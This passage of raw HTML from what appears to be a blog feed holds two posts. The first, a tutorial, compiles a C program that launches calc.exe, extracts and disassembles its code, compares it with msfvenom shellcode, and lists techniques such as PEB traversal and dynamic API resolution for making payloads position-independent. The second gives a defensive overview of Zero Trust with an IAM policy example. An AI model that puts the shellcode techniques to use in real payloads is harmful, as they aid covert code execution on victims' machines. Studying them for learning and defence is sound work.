class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;windows.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">WinExec</span><span class="p">(</span><span class="s">"calc.exe"</span><span class="p">,</span> <span class="n">SW_SHOW</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <p>Then extract the .text section using objcopy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>x86_64-w64-mingw32-objcopy -O binary --only-section=.text exec_calc.exe exec_calc.bin </code></pre> </div> <p>Disassemble with ndisasm<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ndisasm -b 64 exec_calc.bin </code></pre> </div> <p>From the disassembly, we can observe:</p> <ul> <li><p><strong>NOP Padding</strong> – Instructions such as nop word <strong>[cs:rax+rax+0x0]</strong> are inserted by the compiler for alignment or anti-disassembly purposes.</p></li> <li><p><strong>Strong Dependencies</strong> – Frequent usage of rel instructions (e.g., mov rax, [rel 0x34a0]) and API calls via the Import Address Table (IAT), such as jmp [rel 0x72ac] for WinExec.</p></li> <li><p><strong>Indirect Jumps</strong> – Instructions like FF25 (e.g., jmp [rel 0x72ac]) rely on fixed addresses in the import table, indicating tight coupling with the PE loader.</p></li> <li><p><strong>PE Format Reliance</strong> – The code uses system APIs through the IAT and expects the Windows PE loader to handle relocation, section initialization, and runtime setup.</p></li> <li><p><strong>Static API References</strong> – API calls like WinExec are accessed through statically defined entries in the import table.</p></li> <li><p><strong>Excessive Padding and Alignment</strong> – Compiler-inserted padding like <code>0F1F4000 nop dword [rax+0x0]</code> and section alignment at addresses like 0x1800.</p></li> </ul> <h2> Using <code>msfvenom</code> to Generate Shellcode for calc.exe </h2> <p>payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin </code></pre> </div> <p>Disassemble the Shellcode<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$ ndisasm -b 64 calc.bin </code></pre> </div> <h2> Compare MSF shellcode and C </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th></th> <th>Msfvenom</th> <th>C</th> </tr> </thead> <tbody> <tr> <td>Generator Tool</td> <td>Metaploit’s <code>msfvenom</code> </td> <td>Extracted <code>.text</code> section from compiled PE</td> </tr> <tr> <td>Code Type</td> <td>Pure position-independent code (PIC)</td> <td>Compiler-generated, PE-dependent</td> </tr> <tr> <td>Dependency</td> <td>No external dependencies, self-contained</td> <td>Requires PE runtime, IAT, and relocation support</td> </tr> <tr> <td>Size</td> <td>Compact (about 66 bytes)</td> <td>Large (about 6KB)</td> </tr> <tr> <td>Feature</td> <td>1. Direct system calls, no standard library dependencies<br>2. Dynamically resolve WinExec address (via PEB traversal)<br>3. No redundant data, completely location independent</td> <td>1. Rely on PE Import Table (IAT) parsing API<br>2. Contains compiler-generated prologue/epilogue (such as stack frame adjustments)<br>3. Relocations and debugging information are present (even if the .text section is extracted)</td> </tr> <tr> <td>Execute Environmental</td> <td>Can run from any memory address</td> <td>Requires full PE loader support</td> </tr> <tr> <td>API call method</td> <td>Dynamic resolution (gs:[0x60]→PEB→kernel32.dll)</td> <td>Hard-coded address via IAT</td> </tr> <tr> <td>Code alignment</td> <td>No padding bytes</td> <td>Contains NOPs and alignment for structure</td> </tr> <tr> <td>Minimal, self-contained</td> <td>Contains additional runtime/library code</td> <td></td> </tr> </tbody> </table></div> <h1> How to Improve C-Based Shellcode </h1> <p>To make your payload suitable for shellcode use, consider the following techniques:</p> <ul> <li><p><strong>PEB Traversal</strong>: Manually traverse the Process Environment Block (PEB) to locate loaded modules like kernel32.dll and resolve API addresses dynamically.</p></li> <li><p><strong>Dynamic API Resolution</strong>: Avoid using the Import Table; instead, resolve API addresses at runtime using hash-based or name-based lookup.</p></li> <li><p><strong>Avoid Compiler-Inserted Code</strong>: Use assembly or minimal C with inline assembly to bypass compiler-generated code (e.g., prologue/epilogue, SEH).</p></li> <li><p><strong>Position-Independent Code</strong>: Ensure your code can execute from any memory address without relying on relocations or fixed sections.</p></li> </ul> shellcode c security Zero Trust Architecture Practice windasunnie Thu, 13 Feb 2025 04:57:39 +0000 https://forem.com/windasunnie/zero-trust-architecture-practice-245m https://forem.com/windasunnie/zero-trust-architecture-practice-245m <h1> What is Zero Trust ? </h1> <p>Zero Trust is a modern security model that assumes no entity—whether inside or outside the network—is inherently trustworthy. Unlike traditional security models that rely on perimeter-based defenses, Zero Trust enforces strict identity verification, least-privilege access, and continuous authentication for every access request.</p> <h1> How does Zero Trust Work ? </h1> <p>Zero Trust relies on dynamic security policies, contextual awareness, and a system-wide collection of security intelligence. It follows the principle of "never trust, always verify" by continuously monitoring users, devices, and network activity. The key components include:</p> <ul> <li>Identity and access management (IAM)</li> <li>Multi-factor authentication (MFA)</li> <li>Continuous monitoring with Security Information and Event Management (SIEM)</li> <li>Network segmentation and micro-segmentation</li> <li>Endpoint security (EDR/XDR)</li> <li>Strong encryption and data protection policies</li> <li>Secure application and API access</li> </ul> <p>To enforce Zero Trust, security intelligence needs to collect and analyze various data points, including logs, user behaviors, geolocation data, device security posture, and threat intelligence.</p> <h1> Zero Trust Architecture Security Main Principles </h1> <h3> <strong>1. Continuous Monitoring and Validation</strong> </h3> <p>Every access request is evaluated dynamically based on real-time security context. Continuous monitoring involves:</p> <ul> <li> <strong>SIEM (Security Information and Event Management)</strong>: Analyzes logs and user activities to detect anomalies.</li> <li> <strong>XDR (Extended Detection and Response)</strong>: Correlates data across endpoints, networks, and cloud environments.</li> <li> <strong>UEBA (User and Entity Behavior Analytics)</strong>: Identifies suspicious activity based on behavioral patterns. <ul> <li> </li> </ul> </li> </ul> <h3> <strong>2. Least-Privilege Access</strong> </h3> <p>Enforce strict least-privilege access to minimize security risks. Access should be granted based on the principle of "need-to-know" and "just-in-time" privilege escalation.</p> <h3> <strong>Practice Example:</strong> IAM Policy (AWS IAM/ACLs) </h3> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">#</span><span class="w"> </span><span class="err">iam-policy.json</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Sid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"DescribeEC2Instances"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"ec2:DescribeInstances"</span><span class="p">,</span><span class="w"> </span><span class="s2">"ec2:DescribeInstanceAttribute"</span><span class="p">,</span><span class="w"> </span><span class="s2">"ec2:DescribeInstanceStatus"</span><span class="p">,</span><span class="w"> </span><span class="s2">"ec2:DescribeAddresses"</span><span class="p">,</span><span class="w"> </span><span class="s2">"ec2:DescribeImageAttribute"</span><span class="p">,</span><span class="w"> </span><span class="s2">"ec2:DescribeVolumes"</span><span class="w"> </span><span class="p">],</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringEquals"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"aws:RequestedRegion"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-2"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Strong Authentication Mechanisms (2FA/MFA)</strong></p> <p>Replace static credentials with strong authentication mechanisms such as:</p> <ul> <li> <strong>Multi-Factor Authentication (MFA)</strong>: Requires an additional factor beyond passwords.</li> <li> <strong>Passwordless Authentication</strong>: Uses biometrics or cryptographic keys.</li> <li> <strong>Adaptive Authentication</strong>: Dynamically adjusts authentication requirements based on risk factors.</li> </ul> <h3> <strong>4. Micro-Segmentation</strong> </h3> <p>Micro-segmentation divides networks into smaller, isolated zones to prevent lateral movement. This includes:</p> <ul> <li> <strong>Software-Defined Perimeters (SDP)</strong>: Dynamically controls access to resources.</li> <li> <strong>ZTNA (Zero Trust Network Access)</strong>: Provides secure, identity-based access without exposing resources to the internet.</li> <li> <strong>Cloud Security Posture Management (CSPM)</strong>: Continuously monitors cloud environments for misconfigurations.</li> </ul> <h3> <strong>5. Curbing Lateral Movement</strong> </h3> <p>To prevent attackers from moving laterally within a network:</p> <ul> <li>Enforce <strong>strict access controls</strong> and short-term session validity.</li> <li>Implement <strong>Network Access Control (NAC)</strong> to validate device posture.</li> <li>Use <strong>Privileged Access Management (PAM)</strong> to restrict administrative access.</li> </ul> <h2> Zero Trust Architecture Best Practices </h2> <h3> <strong>1. Scan Everything (100% Visibility)</strong> </h3> <p>Monitor and analyze all activities across:</p> <ul> <li><strong>ZTNA (Zero Trust Network Access)</strong></li> <li><strong>EDR/XDR (Endpoint Detection and Response)</strong></li> <li><strong>SIEM (Security Information and Event Management)</strong></li> <li><strong>CASB (Cloud Access Security Broker)</strong></li> </ul> <h3> <strong>2. Segment Everything (Micro-Segmentation)</strong> </h3> <ul> <li>Use <strong>Software-Defined Networking (SDN)</strong> to enforce segmentation.</li> <li>Apply <strong>layered firewall policies</strong> to restrict unauthorized access.</li> </ul> <h3> <strong>3. Encrypt &amp; Protect Data</strong> </h3> <ul> <li> <strong>End-to-End Encryption (E2EE)</strong> ensures data confidentiality.</li> <li> <strong>Data Loss Prevention (DLP)</strong> policies prevent unauthorized data exfiltration.</li> <li> <strong>Cloud Security and Identity Protection</strong> mitigate risks associated with SaaS applications.</li> </ul> <h2> Recommended Zero Trust Tools </h2> <h3> <strong>Network Security and Access Control</strong> </h3> <ul> <li><strong>Cloudflare Zero Trust (Cloudflare Access, Gateway)</strong></li> <li><strong>Tailscale/ZTNA solutions</strong></li> <li><strong>Palo Alto Networks Prisma Access</strong></li> <li><strong>Zscaler Private Access (ZPA)</strong></li> </ul> <h3> <strong>Identity and Access Management (IAM)</strong> </h3> <ul> <li> <strong>Okta</strong> (Identity provider, SSO, MFA, Adaptive Authentication)</li> <li> <p><strong>Auth0</strong> (OAuth2, OIDC, JWT-based authentication)</p> <ul> <li>OAuth2 <ul> <li><strong>Industry Standard</strong></li> <li><strong>Fine-Grained Access Control</strong></li> </ul> </li> </ul> <p><a href="" class="article-body-image-wrapper"><img alt="This is OAuth2 authentication example"></a></p> <p>This is OAuth2 authentication example</p> </li> <li><p><strong>Azure AD Conditional Access</strong></p></li> </ul> <h3> <strong>Endpoint and Security Monitoring</strong> </h3> <ul> <li><strong>CrowdStrike Falcon (EDR/XDR)</strong></li> <li><strong>SentinelOne (EDR/XDR)</strong></li> <li><strong>Microsoft Defender for Endpoint</strong></li> </ul> <h3> <strong>Zero Trust Network Access (ZTNA) Solutions</strong> </h3> <ul> <li> <strong>Tailscale</strong> (WireGuard-based private networking)</li> <li> <strong>Google BeyondCorp Enterprise</strong> (ZTNA)</li> <li> <strong>HashiCorp Boundary</strong> (Secure remote access)</li> </ul> <h3> <strong>Cloud Security &amp; Data Protection</strong> </h3> <ul> <li><strong>AWS GuardDuty, Macie, and Security Hub</strong></li> <li><strong>Google Chronicle &amp; Security Command Center</strong></li> <li><strong>Microsoft Defender for Cloud</strong></li> </ul> <h3> <strong>Good Practice</strong> </h3> <ul> <li> <strong>Use battle-tested solutions at scale</strong>: <a href="https://github.com/hoophq/hoop" rel="noopener noreferrer">HoopHQ Zero Trust</a> </li> <li><strong>Secure SaaS with Cloudflare Access or BeyondCorp</strong></li> <li><strong>Automate security policies with Infrastructure as Code (IaC) tools like Terraform</strong></li> </ul> zerotrust